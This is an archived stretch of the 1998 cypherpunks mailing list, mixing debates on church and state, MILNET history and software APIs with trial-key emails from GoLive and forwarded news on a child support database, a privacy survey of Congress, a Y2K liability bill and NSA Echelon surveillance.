> 
> >By *their* standard, by their own personal judgement. There's no
moral
> >yardstick, and God help us if there is in the future. Who makes the
> >yardstick? Who sits down and says, "This is the moral standard in
this
> >country, abide by it or suffer the consequences"?
> 
> Sorry but there are absolutes and there is a moral yardstick. 
Whether this
>  is accepted or not is beside the point.
> 
> There has to be absolutes otherwise any action can be excused (or
damned).
>   The real cry should be
> "God help us to instigate Your yardstick".  God doesn't change and
neither
> does His measure.
> 
> 1)Love the Lord, with all your heart, with all you soul with all
your mind
> and all your strength
> 2)Love you neibour as yourself.
> 
> Everything else hangs on these.
> 
> 
> 

==
"The same thing we do every night Pinkey,
 try to take over the WORLD!"
                          - The brain
_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 29 Sep 1998 07:18:26 +0800
To: jaeger@hempseed.com
Subject: Re: Democracy...
Message-ID: <199809291205.OAA24670@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



The government can't make laws favoring one religion thereby
restricting another religion.  The urban legend that it was only meant
to stop government from restricting a religion was a misquote from
some misguided pastor.  Separation of church and state is just that,
that is what the country was founded on.  This is also a thread for
the lists and newsgroups that it was intended for.




---Jaeger <Jaeger@hempseed.com> wrote:
>
> well, the first amendment is what I expected to be used...
> unfortunately, the phrase "...wall of separation between church and
> state" is not taken from the first amendment.  It is taken from a
letter
> written by Thomas Jefferson...  and the meaning is not that church
> shouldn't have an effect on the state.  The state CAN support one
> religion over another.  In context, the phrase simply explains that
the
> government can't make laws that RESTRICT religious practice or
doctrinal
> issues.  The state CAN make laws that encourage the practice of any
one
> particular religion, as long as the laws do not RESTRICT the
PRACTICE of
> other religions.  Making people uncomfortable isn't a constitutional
> reason to overturn a law.
> 
> btw, notice the wording in the first amendment...it only restricts
gov't
> restrictions on religion.
> 
> Jaeger
> 
> > Gee, check out the First Amendment to the U.S. Constitution. Also
the
> > first
> > item in the Bill of Rights. "Congress shall make no law respecting
the
> >
> > establishment of religion or prohibiting the free exercise
thereof..."
> >
> > (from memory, so don't bother me with minor wording corrections.)
> >
> > By standard convention, this is also referred to as "separation of
> > church
> > and state."
> >
> > As with the clueless AOLers yakking about an "Assimov" story they
read
> > a
> > couple of years ago in the 5th grade, you bozos need to get educated
> > and
> > spend a minute or two thinking before writing.
> >
> 
> 
> 
> 

==
"The same thing we do every night Pinkey,
 try to take over the WORLD!"
                          - The brain
_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sales@golive.com
Date: Tue, 29 Sep 1998 16:51:36 +0800
To: cypherpunks@cyberpass.net
Subject: GoLive CyberStudio 30-day Activation Key
Message-ID: <199809292142.OAA11348@company.golive.com>
MIME-Version: 1.0
Content-Type: text



Dear Fritzie,

Thank you for downloading the GoLive CyberStudio Tryout
software.

Your official 30-day activation key is: TRIA1MT23NFJD8MXGGJ85UDA

You'll need to enter this key when you first start-up the
software.

Included with the GoLive CyberStudio installation are the
latest Release Notes and New Product Features for GoLive
CyberStudio.

NOTE: If you are using Stuffit Expander 4.5.x to decode and
decompress PDF documents, please make sure the cross
platform preference and the option "Convert Text Files to
Macintosh Format" is set to "Never".

If you have questions about how to use the Tryout software,
GoLive's knowledgeable Technical Support staff is available
to assist you. We suggest you first check the Technical
Support section of our Web site www.golive.com. If you don't
find your answers there, please send us an email at
support@golive.com or call 1-800-554-6638. 

When you are ready to purchase GoLive CyberStudio or if you
want to know more about why GoLive CyberStudio is the best
product for Web site design, please return to our Web site
or contact me at 1-800-554-6638 or 1-650-463-1580.

Sincerely,

Dan Fernandez
Director US Sales
GoLive Systems
Sales@Golive.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sales@golive.com
Date: Tue, 29 Sep 1998 16:56:22 +0800
To: cypherpunks@cyberpass.net
Subject: GoLive CyberStudio Personal Edition
Message-ID: <199809292147.OAA11434@company.golive.com>
MIME-Version: 1.0
Content-Type: text



Dear Fritzie,

Thank you for downloading the GoLive CyberStudio Tryout
software.

Your official 30-day activation key is: MWT4QWF7F8WP7GJJ

You'll need to enter this key when you first start-up the
software.

Included with the GoLive CyberStudio installation are the
latest Release Notes and New Product Features for GoLive
CyberStudio.

NOTE: If you are using Stuffit Expander 4.5.x to decode and
decompress PDF documents, please make sure the cross
platform preference and the option "Convert Text Files to
Macintosh Format" is set to "Never".

If you have questions about how to use the Tryout software,
GoLive's knowledgeable Technical Support staff is available
to assist you. We suggest you first check the Technical
Support section of our Web site www.golive.com. If you don't
find your answers there, please send us an email at
support@golive.com or call 1-800-554-6638. 

When you are ready to purchase GoLive CyberStudio or if you
want to know more about why GoLive CyberStudio is the best
product for Web site design, please return to our Web site
or contact me at 1-800-554-6638 or 1-650-463-1588.

Sincerely,

Dan Fernandez
Director US Sales
GoLive Systems
Sales@Golive.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sales@golive.com
Date: Tue, 29 Sep 1998 16:56:21 +0800
To: cypherpunks@cyberpass.net
Subject: GoLive CyberStudio 30-day Activation Key
Message-ID: <199809292147.OAA11432@company.golive.com>
MIME-Version: 1.0
Content-Type: text



Dear Fritzie,

Thank you for downloading the GoLive CyberStudio Tryout
software.

Your official 30-day activation key is: TRIA1MT23NFJD8MXGGJ85UDA

You'll need to enter this key when you first start-up the
software.

Included with the GoLive CyberStudio installation are the
latest Release Notes and New Product Features for GoLive
CyberStudio.

NOTE: If you are using Stuffit Expander 4.5.x to decode and
decompress PDF documents, please make sure the cross
platform preference and the option "Convert Text Files to
Macintosh Format" is set to "Never".

If you have questions about how to use the Tryout software,
GoLive's knowledgeable Technical Support staff is available
to assist you. We suggest you first check the Technical
Support section of our Web site www.golive.com. If you don't
find your answers there, please send us an email at
support@golive.com or call 1-800-554-6638. 

When you are ready to purchase GoLive CyberStudio or if you
want to know more about why GoLive CyberStudio is the best
product for Web site design, please return to our Web site
or contact me at 1-800-554-6638 or 1-650-463-1580.

Sincerely,

Dan Fernandez
Director US Sales
GoLive Systems
Sales@Golive.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sales@golive.com
Date: Tue, 29 Sep 1998 17:01:10 +0800
To: cypherpunks@cyberpass.net
Subject: GoLive CyberStudio 30-day Activation Key
Message-ID: <199809292151.OAA11490@company.golive.com>
MIME-Version: 1.0
Content-Type: text



Dear Fritzie,

Thank you for downloading the GoLive CyberStudio Tryout
software.

Your official 30-day activation key is: TRIA1MT23NFJD8MXGGJ85UDA

You'll need to enter this key when you first start-up the
software.

Included with the GoLive CyberStudio installation are the
latest Release Notes and New Product Features for GoLive
CyberStudio.

NOTE: If you are using Stuffit Expander 4.5.x to decode and
decompress PDF documents, please make sure the cross
platform preference and the option "Convert Text Files to
Macintosh Format" is set to "Never".

If you have questions about how to use the Tryout software,
GoLive's knowledgeable Technical Support staff is available
to assist you. We suggest you first check the Technical
Support section of our Web site www.golive.com. If you don't
find your answers there, please send us an email at
support@golive.com or call 1-800-554-6638. 

When you are ready to purchase GoLive CyberStudio or if you
want to know more about why GoLive CyberStudio is the best
product for Web site design, please return to our Web site
or contact me at 1-800-554-6638 or 1-650-463-1580.

Sincerely,

Dan Fernandez
Director US Sales
GoLive Systems
Sales@Golive.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leif Ericksen <leif@imho.net>
Date: Tue, 29 Sep 1998 15:29:44 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re:
In-Reply-To: <199809291849.UAA29124@replay.com>
Message-ID: <36113E11.34C257A1@imho.net>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:
> 
> At 08:21 AM 9/29/98 -0500, Jim Choate wrote:
> >
> >It's called milnet and it's been in existance ever since about '83. It

1983????  Are you 100% sure about that I am almost 100% sure that it was
alone longer than that.  I can not be quoted on it but I am sure that it
was in existence before that...  OH I beg your pardon, 1983 is what the 
government will really admit to even if there are documents that show it
may be older than that....


			HRMMM....

		:)
			- lhe
> >occured when ARPA became DARPA. I was working on a DoD project at UT Austin
> >at the time.
> 
> Look up SIPRNET
> 
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 29 Sep 1998 14:45:59 +0800
To: cypherpunks@toad.com
Subject: Re: Army Plonks
In-Reply-To: <199809291848.UAA28989@replay.com>
Message-ID: <199809291936.PAA08772@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



These are quotes from a mil news group where this is being 
discussed.

"Thing is, many of the Army's sites offered a wealth of
information, unclassified, and readily available in hardcopy,
to anybody who wants it.

To ease distribution and save millions in costs of distributing
this material around the world, the Web cannot be beat,
as even Hamre's directive emphasized for contracting and 
purchasing defense goods and educating its personnel.

An West Point bozo fucked up royally by pissing an arc to show Hamre
the combat guys know how to blow shit away big time -- the turkey
was named in some news reports, a LtGen of Info Services -- and revelaed
his prejudice toward loathsome civvy control and wily-hackered the 
whole damn system, "stupid jerk, fucking asshole, eat shit, fuck you,"
as my sqawk box mocks.

Hamre will get hammered for overreacting, too, he's been whining
about cyber threats for months now, when it's clear he doesn't
know shit about such systems, like most of the wrinkled fucks running
the natsec operation. They won't listen to the youngsters under
their command, they just want to destroy something to prove their
hardware prowess, being unable to wave their shriveled dicks now
that they'll get cashiered for being inappropriately related to
underlings.

It will cost the military millions if not billions to return to a closed 
information system. And all those folks who were selling handy
off the shelf stuff for ballooning mil siles aint gonna keep quiet -- 
unless they get sweetheart deals for 10 times cost for secret shit that
aint worth shit to anybody except the lard asses always screaming
for more protection for the Amercian people."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 29 Sep 1998 15:36:14 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: (fwd)
Message-ID: <199809292035.PAA08234@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 29 Sep 1998 15:07:45 -0500
> From: Leif Ericksen <leif@imho.net>
> Subject: Re: 

> > At 08:21 AM 9/29/98 -0500, Jim Choate wrote:
> > >
> > >It's called milnet and it's been in existance ever since about '83. It
> 
> 1983????  Are you 100% sure about that I am almost 100% sure that it was
> alone longer than that.  I can not be quoted on it but I am sure that it
> was in existence before that...  OH I beg your pardon, 1983 is what the 
> government will really admit to even if there are documents that show it
> may be older than that....

Might have been 82, find out when ARPA became DARPA and *only* worked on
defense related material. The distinction was one of administration and
not physical changes to anything other than some nameservers and routers.

When the change happened it meant that ARPA could no longer participate
as an equal with the NFS so they split the funding and administrative
servers.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 29 Sep 1998 17:29:46 +0800
To: "Sporting Shooters Association of Australia" <Alexdoulis@aol.com>
Subject: No Subject
Message-ID: <199809292223.SAA02381@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



Excerpt from the Canadian Firearms Digest, V2 #612

================ begin forwarded opinion ===============
Date: Mon, 28 Sep 1998 13:40:01 -0600
From: someone@somewhere.net
Subject: RCMP now have .50 cal. BMG's

I have just learned from a highly reliable confidential source 
that in addition to the .50 cal  McMillian sniper rifles and 
the untalked about Barrett Light .50's, the RCMP  have now added 
to  their arsenal a number of .50 cal. Browning Machine Guns. 

Staff from the RCMP are headed to Belgium to be trained in 
the armoring of these military heavy  machine guns. Machine 
guns may at some point be used against the Canadian public, 
possibly to  quell a native disturbance or other civil unrest. 
If we were attacked by outside forces the military  would be 
the pressed into service, as this is not the role of the RCMP. 

This leads one to ask what use the RCMP, who are a police force 
not an army in occupation,  would have for such heavy armament 
...... or is it possible that I have it wrong, possibly they 
are  now an army in occupation. Is it possible that the RCMP 
are now the political policing arm of the  Government. 

The lethality of this weapon makes pepper spray look like a 
Sunday shower. Maybe this is the  next weapon demonstrators 
will be facing at the orders of the PM's office.
================ end forwarded opinion ================

Ciao all.






Definition:  FASCISM: n.:  a political and economic movement, strongly nationalistic, magnifying the rights of the state as opposed to those of the individual, in which industry, though remaining largely under private ownership, and all administrative
political units, are controlled by a strong central government.
        -------------------------------------------------
"One of the ordinary modes by which tyrants accomplish their purpose, without resistance, is by disarming the people and making it an offense to keep arms".  - Joseph Story, U.S. Supreme Court Justice.
        -------------------------------------------------
the German gun control laws were enacted by the "liberal" Weimar Republic government that preceded Hitler, and were a strong aid to his coming to power -- because they disarmed Hitler's opponents, and Hitler's adherents ignored them -- as criminals have always ignored gun control laws.

Disarming the public is a frequent first step toward dictatorships and genocides.  Once the disarming is complete, the public is helpless against those who have the guns.        -------------------------------------------------

PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Tue, 29 Sep 1998 20:43:19 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A19284704@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




Jim Choate wrote:
> The only objection to releasing an API is to 
> stifle competition, *THAT* is a bad thing.

There are a number of other reasons -- principally support and backwards
compatibility costs. If you release an API for a commercial application
for ISVs, you better make sure it is relatively bug-free and mature. As
soon as someone else's code relies on that API, you are stuck with
making sure it continues to work as the product evolves.

There is nothing wrong with public and private APIs, and we hope that
the ad hoc private APIs from some midnight-oil-burning-hack to get the
product to ship on time that have useful functionality will eventually
be integrated into a mature public API.

Modular OOP design means you have lots of interfaces, you don't
necessarily want people to be able to dig in-between all the pieces of
your program -- often you cannot protect application/data integrity if
they do.

It's like custom software versus shrink-wrap. I write a lot of custom
software, it works for what it needs to do for a specific scenario, if
that changes I modify and recompile. There is a *lot* of work -- time,
money, *my* cost -- to take that custom application and make it flexible
and generic enough to be shrink-wrap and work in all scenarios. And if I
don't do it well enough I have a major support/liability problem. Same
applies to public vs private APIs.

> The idea from a free-market perspective:

> Had Microsoft, for example, been required to publish their 
> API's by the market we wouldn't be spending all this effort

You state free-market and then you are *requiring* someone to do
something? How do you resolve that contradiction? Require = Force !=
Free[dom]

As far as *commercial* software vendors go, Microsoft is one of the
better companies for publishing APIs and creating useful APIs and tools
for Rapid Application Development. Do you subscribe to MSDN? Please do
before you crucify Microsoft for lack of APIs, if anything they have too
many.

> Bottem line, if you believe in a free-market (which requires fair
> competition to work and prevent monopolies)

Pure speculative nonsense contrary to empirical evidence. Market
distortions the government creates are far worse than any Wonderland
monopoly you can dream up that will exist in a true free market.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lazlo Toth <lazlototh@hempseed.com>
Date: Tue, 29 Sep 1998 18:01:03 +0800
To: "Vladimir Z. Nuri" <cypherpunks@cyberpass.net
Subject: Re: IP: The virtual president
In-Reply-To: <199809290021.RAA15032@netcom13.netcom.com>
Message-ID: <v04011707b23716a63069@[199.125.99.109]>
MIME-Version: 1.0
Content-Type: text/plain



"Someone else," aka "Flagship" == "The People"?

-Lazlo



At 5:21 PM -0700 9/28/98, you wrote:
>From: Jean Staffen <jstaffen@flash.net>
>Subject: IP: The virtual president
>Date: Fri, 25 Sep 1998 22:22:11 -0500 (CDT)
>To: ignition-point@majordomo.pobox.com
>
>This is the most INCREDIBLE article.  I never thought I'd read something
>like this in the mainstream media!!! -Jean
>
>
>                   The virtual president=20
>                 =20
>
>                   By Missy Kelly=20
>                   Copyright 1998, WorldNetDaily.com=20
>
>                   "You know, by the time you become the leader of a
>                   country, someone else makes all the decisions." -- Bill
>                   Clinton September 4, 1998=20
[snip]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 29 Sep 1998 13:58:07 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809291848.UAA28989@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:30 AM 9/29/98 -0400, John Young wrote:
>Now that the terrified US Army has axed its Web sites, and 
>NSA and several other mil sites seem inaccessible and
>"temporarily unavailable" this morning, could this portend
>a dual-use of the Internet, a closed one for porkbarrell mil and
>secret gov sweethearts and a sappy infotainment one for civilians 
>to gameboy infofoolery?

Well, for some months now they've password protected some of the more
delicate stuff (e.g., "lessons learned", some of the field manuals).  And
they have been rejecting non .mil addresses too.

Certainly we can expect them to eventually get a clue and 
think about what's out there.  Mostly they have.  (Of course it was within
the last year that a .mil was exporting PGP!) The army's over-reaction
is quaint but essentially reasonable --the W3 pages are just PR,
and they're real edgy these days after they tried to scalp Osama
with a tomohawk.

[digression: I wonder when Osama will have his own web page with matching
funds for the head of the Great Satan, and whether there would
be a shootout on the net, e.g., the DNS records being changed, a
phone call to their ISP]

As far as the NSA's online personnel records, I bet they're still worried
about the CIA shootout down the street a few years back.

There's still plenty of names, phones, email addresses in the 
.gov domain, with building locations, etc.  But Jim Bell is
locked up so they're not so uptight.


>That would be a tri-power-gov implementation of dual-use 
>terror-scare to hide perkbellied privileges of natsec obsession.

They keep trying different passwords to the constitution.
Its a dictionary attack: "pedophile", "droogs", "terrorist", "WMD", etc.

--Ceci n'est-ce pas un Toto










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 29 Sep 1998 13:58:40 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809291849.UAA29124@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:21 AM 9/29/98 -0500, Jim Choate wrote:
>
>It's called milnet and it's been in existance ever since about '83. It
>occured when ARPA became DARPA. I was working on a DoD project at UT Austin
>at the time.


Look up SIPRNET








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 29 Sep 1998 23:07:00 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [FP] National registry to track child support
Message-ID: <199809300407.VAA08285@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net>
Subject: IP: [FP] National registry to track child support
Date: Tue, 29 Sep 1998 06:59:33 -0500
To: ignition-point@majordomo.pobox.com

======================================================================
SCAN THIS NEWS
09/28/98

---------------------------------------------------------------
Ya know, they could darn near track anyone with this thing...
---------------------------------------------------------------

09/28/98- Updated 12:15 AM ET
 The Nation's Homepage

National registry to track child support

WASHINGTON - Beginning Wednesday, every one of the 16 million parents
nationwide who are required to pay child support will be logged into a
massive database to help the federal government track down those who fail to
pay.

[Well that's nice, now they'll be in there with the rest of us sheeple.]

The registry will allow authorities to keep tabs on the more than 5 million
parents, most of them fathers, who have moved to another state after a
divorce, separation or breakup.

[Yea, and about 200 million of us who haven't.]

Many reneged or fell behind on support payments, says Michael Kharfen, a
spokesman for the U.S. Department of Health and Human Services, which will
run the database.

"Before, it was very difficult for a state to track down where the parent
went, where he was working and how much money he was actually making,"
Kharfen says. "This database will track them, no matter where in the country
they move."

[Hey Keefer, there was a reason it was difficult - it was called liberty!]

Critics of the registry say it violates the privacy of law-abiding parents.
"Because someone gets a divorce doesn't mean their job, their income, should
become an open book," fathers' rights attorney D. Gerald Williams says.

[Wrong answer: critics are opposed to it because it violates fundamental
rights of the "non-delinquent" citizens by forcing them into the same
"locating and tracking" system.]

Kharfen counters that the system is critical to states, which collect only
about 22% of the $50 billion owed in child support every year. By federal
estimates, 60% of parents involved in child custody cases renege on their
payments.

[Keefer - get out of the social payments system altogether. Then, you won't
have this huge problem you've created -- "tracking delinquent parents."]

Officials estimate that the system will recoup $10 billion in delinquent
payments a year.

[Probably about 20% of what the system costs to operate, and about 5% of
what the "system" spends as a whole.]

To track down scofflaws, the government will compare its list of parents
with another new database that contains employment records for more than 140
million workers in the United States. That database, which was unveiled in
October 1997, lists an employee's identity, address and salary.

By cross-referencing lists, "we'll be able to tell the state that's looking
for him whether they should start going for his paycheck," Kharfen says.

[And it's about time for the citizenry to start going after some
Congressmen's paycheck Keefer, then, perhaps, yours to follow!]

By Scott Bowles, USA TODAY

[With comments by Scott McDonald - today]

http://search.usatoday.com/plweb-cgi/fastweb?getdoc+default+news+5734+0+wAAA
+registry

---------------------------------------------------------------
[thanks to J. Groom for the forward]
=======================================================================
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================






**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 29 Sep 1998 23:07:05 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Group 'No Privacy for Privacy Hypocrites' Surveys Congress
Message-ID: <199809300407.VAA08296@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Group 'No Privacy for Privacy Hypocrites' Surveys Congress
Date: Tue, 29 Sep 1998 11:32:02 -0500
To: believer@telepath.com

Source:  US Newswire
http://www.usnewswire.com/topnews/Current_Releases/0928-131.txt

Privacy Group Surveys Congress 
U.S. Newswire
28 Sep 18:17

 Group 'No Privacy for Privacy Hypocrites' Surveys Congress
 To: National Desk
 Contact: James Love, 202-387-3080

   WASHINGTON, Sept. 28 /U.S. Newswire/ -- No Privacy for Privacy
Hypocrites, a citizen's group formed to counteract the assault
on privacy by the Kenneth Starr/congressional investigations
into President Clinton's sex life, has distributed a survey
to Members of Congress regarding their views on privacy.

   Members of Congress who oppose privacy rights will be asked
whether or not they have ever participated in an adulterous
affair, and whether or not they have lied about it.

   The group is concerned that the Kenneth Starr/congressional
investigations into the president's sex life are having a negative
impact on privacy that will affect ordinary citizens.

   "This whole sad affair is the product of decades-long disrespect
for privacy, for which our political leaders are responsible," said
Evan Hendricks, Editor and Publisher of "Privacy Times," and one of
the organizers of the group.

   "This effort is intended to arrest the free fall of privacy rights
triggered by the stunning abuses of power by the Starr investigation
and the Congressional dissemination of personal information," said
James Love.

   Today, No Privacy for Privacy Hypocrites distributed a survey to
Members of Congress asking:

  1. (A) Is consensual, non-commercial sexual conduct by adults in
private ever a proper subject for government inquiry? (B) Do you
believe that any branch of government should investigate allegations
that elected officials may have participated in an adulterous affair,
including allegations that they may have lied about it?

  2. If you answered "yes" to (A) or (B) in question (1): (A) Have
you ever participated in an adulterous affair?  (B) If yes, have you
ever lied about it?

  3. Do you think that any public official who has committed adultery
and lied about it should resign from public office?

   Survey responses will be placed on the web at:
http://www.noprivacy.org, as soon the surveys are returned.

 -0-
 /U.S. Newswire  202-347-2770/
 09/28 18:17

Copyright 1998, U.S. Newswire
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 29 Sep 1998 23:15:38 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Senate Passes Y2K Liability Limitation Bill
Message-ID: <199809300407.VAA08307@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Senate Passes Y2K Liability Limitation Bill
Date: Tue, 29 Sep 1998 11:35:10 -0500
To: believer@telepath.com

Source:  US Newswire
http://www.usnewswire.com/topnews/Current_Releases/0929-101.txt

Senate Passes Y2K Liability Limitation Bill 
U.S. Newswire
29 Sep 8:49

 Senate Passes Y2K Liability Limitation Bill
 To: National and State desks
 Contact: David Carle of the Office of Sen. Patrick Leahy,
          202-224-3693

   WASHINGTON, Sept. 29 /U.S. Newswire/ -- Following is the statement
of Sen. Patrick Leahy (D-Vt.), ranking member of the Senate Judiciary
Committee, on Senate passage Monday night, Sept. 28, 1998, of the
Hatch-Leahy-Kyl Substitute to S.2392, which was initially introduced
by Sen. Bob Bennett, R-Utah, at the request of the Administration.
The bill also includes a new amendment by Sen. Fred Thompson
(R-Tenn.).

   The bill now goes to the House. The bill's purpose is to encourage
the full disclosure and exchange of solutions and test results for
Year 2000 computer problems, by providing limited liability
protection, for a limited time, for specific kinds of Year 2000
information that is considered essential to remediation efforts,
but not for faulty products or services. It promotes
company-to-company information sharing, without limiting the rights
of consumers.  The bill also includes a Leahy provision chartering
a national Y2K Website for consumers, small businesses and local
governments.

   "Four-hundred and fifty-eight days from now, millions of computers
controlling our air traffic, recording credit card sales, running
electric and phone systems, tracking bank deposits and monitoring
hospital patients may crash in befuddlement.

   "No bill can magically solve the Y2K problem, but this bill
greatly increases the chances that people will come forward more
readily with solutions.

   "This bill also includes a provision I have offered that will help
consumers, small businesses and local governments by chartering a
national information clearinghouse and Website as a starting point
to provide rapid and accurate information about solving Y2K problems.

   "Knowledge is power in exterminating the millennium bug, and it
makes perfect sense to amplify and encourage the use of the Internet
itself as an information resource in grappling with this problem."

 -0-
 /U.S. Newswire  202-347-2770/
 09/29 08:49

Copyright 1998, U.S. Newswire
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 29 Sep 1998 23:15:31 +0800
To: cypherpunks@cyberpass.net
Subject: IP: NSA listening practices called European `threat'
Message-ID: <199809300407.VAA08318@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: NSA listening practices called European `threat'
Date: Tue, 29 Sep 1998 11:43:12 -0500
To: believer@telepath.com

Source:  Baltimore Sun
http://www.sunspot.net/cgi-bin/editorial/story.cgi?storyid=900000194001

NSA listening practices called European `threat'
European Parliament report accuses agency of widespread spying 

By Neal Thompson 
Sun Staff

The National Security Agency has incurred the wrath of some U.S.
allies and triggered debate about increased global eavesdropping,
thanks to a new report that accuses the agency of spying on
European citizens and companies.

With the help of a listening post in the moors of northern England,
NSA for nearly a decade has been snatching Europe's electronic
communications signals, according to a report for the European
Parliament.

"Within Europe, all e-mail, telephone and fax communications are
routinely intercepted by the United States National Security Agency,
transferring all target information to Fort Meade," said the report.

`Powerful threat'

It warned that the NSA's tactics represent a "powerful threat to civil
liberties in Europe" at a time when more communication -- and
commerce -- is conducted electronically.

A preliminary version of the report circulated overseas in recent
months, touching off heated debate, with front-page stories in Italy,
France, Scotland, England, Belgium and even Russia.

The NSA won't discuss the report or even admit that the listening
post exists.

But this week, two days of debate in the European Parliament
continued the extraordinary public disclosure of comprehensive
post-Cold War spying by the agency. On Wednesday, the
Parliament passed a resolution seeking more accountability from such
eavesdropping arrangements and more assurances that they won't be
misused.

"We want to make sure that somebody's watching them," said Glyn
Ford, a British member of the European Parliament, the legislative
body for the 15-member European Union.

Observers say this was the first time a governmental body has
described in detail -- and then criticized -- the NSA's tactics.

"The cat's well and true out of the bag," said Simon Davies, director
of the London-based watchdog group Privacy International. "I would
argue that we have made the grandest step in 50 years toward
accountability of such national security transparencies."

The report describes a sophisticated program called Echelon, which
the NSA established in conjunction with British intelligence agencies.
The program includes a listening post in Menwith Hill, in Yorkshire,
whose satellite dishes soak up the satellite and microwave
transmissions carrying Europe's telephone conversations, faxes and
e-mail.

Unlike Cold War spying aimed at the military, Echelon is a global
electronic surveillance system that targets individuals, businesses,
governments and organizations, the report says.

The U.S. shares the information with Britain, Canada, Australia and
New Zealand as part of an intelligence-sharing agreement called
UKUSA. Each nation has its own set of key words, so it can seek
information on specific issues, the report states.

Europe is but a fraction of Echelon's target area -- and the Menwith
Hill post is one of at least 10 around the world, the report adds.

"One reason its a bigger deal over there than it is over here [in the
U.S.] is because the SIGINT [signals intelligence] systems are over
their heads and not our heads," said Jeffrey Richelson, an analyst
with the National Security Archives, a U.S. group seeking to
declassify intelligence related documents.

Echelon repercussions

